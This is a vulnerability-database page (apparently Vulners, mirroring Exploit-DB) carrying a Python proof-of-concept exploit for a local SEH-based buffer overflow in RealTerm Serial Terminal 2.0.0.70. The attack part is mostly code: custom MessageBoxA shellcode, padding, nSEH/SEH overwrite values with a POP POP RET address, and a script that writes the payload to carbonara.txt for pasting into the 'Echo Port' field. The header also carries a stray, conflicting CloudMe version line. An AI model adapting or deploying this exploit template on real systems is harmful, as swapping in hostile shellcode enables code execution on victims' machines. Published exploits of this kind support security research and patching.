Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

RealTerm Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow (SEH)

🗓️ 21 Feb 2019 00:00:00Reported by Matteo MalvicaType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 80 Views

RealTerm Serial Terminal 2.0.0.70 'Echo Port' Buffer Overflow (SEH) exploi

Code
# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH) 
# Date: 21.02.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage: https://realterm.sourceforge.io/
# Software Link: https://sourceforge.net/projects/realterm/files/ 
# Version: 2.0.0.70
# Category: Local
# Contact: https://twitter.com/matteomalvica
# Version: CloudMe Sync 1.11.2
# Tested on: Windows 7 SP1 x64
# Originail PoC https://www.exploit-db.com/exploits/46391

# 1.- Run the python script  it will create a new file "carbonara.txt"
# 2.- Copy the content of the new file 'carbonara.txt' to clipboard
# 3.- Open realterm.exe 
# 4.- Go to 'Echo Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> Change
# 7.- Check 'Echo On' or 
# 8.- Box!


import socket
import struct

'''
badchars: 0x20,0x0a
arwin.exe user32.dll MessageBoxA
arwin - win32 address resolution program - by steve hanna - v.01
MessageBoxA is located at 0x747cfdae in user32.dll
'''
shellcode = (
"\x33\xc0"                          # XOR EAX,EAX
"\x50"                              # PUSH EAX      => padding for lpCaption
"\x68\x7a\x6f\x21\x21"              # PUSH "zo!!"
"\x68\x61\x76\x61\x6e"              # PUSH "avan"
"\x8B\xCC"                          # MOV ECX,ESP   => PTR to lpCaption
"\x50"                              # PUSH EAX      => padding for lpText
"\x68\x6e\x7a\x6f\x21"              # PUSH "nzo!"
"\x68\x61\x76\x61\x21"              # PUSH "ava!"
"\x8B\xD4"                          # MOV EDX,ESP   => PTR to lpText
"\x50"                              # PUSH EAX - uType=0x0
"\x51"                              # PUSH ECX - lpCaption
"\x52"                              # PUSH EDX - lpText
"\x50"                              # PUSH EAX - hWnd=0x0
"\xBE\xae\xfd\x7c\x74"              # MOV ESI,USER32.MessageBoxA <<< hardcoded address
"\xFF\xD6")                         # CALL ESI

pad1="\x90"*(142-len(shellcode))
pad2 = "\x42" * 118
nseh = "\xEB\x80\x90\x90"
jmp_back = "\xEB\x80\x90\x90"
short_jmp = "\xEB\x12\x90\x90"
seh =  struct.pack('<L',0x00406e27)  # 00406e27# POP POP RET
nops = "\x90\x90\x90\x90"
payload = pad1  + shellcode + nops + jmp_back + pad2 + nseh + seh 


try:
        f=open("carbonara.txt","w")
        print "[+] Creating %s bytes pasta payload.." %len(payload)
        f.write(payload)
        f.close()
        print "[+] Carbonara created!"

except:
        print "Carbonara cannot be created"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Feb 2019 00:00Current
7.4High risk
Vulners AI Score7.4
realtermserial terminalbuffer overflowsehexploitvendorlocalcontactcloudme syncwindows 7exploit-db
80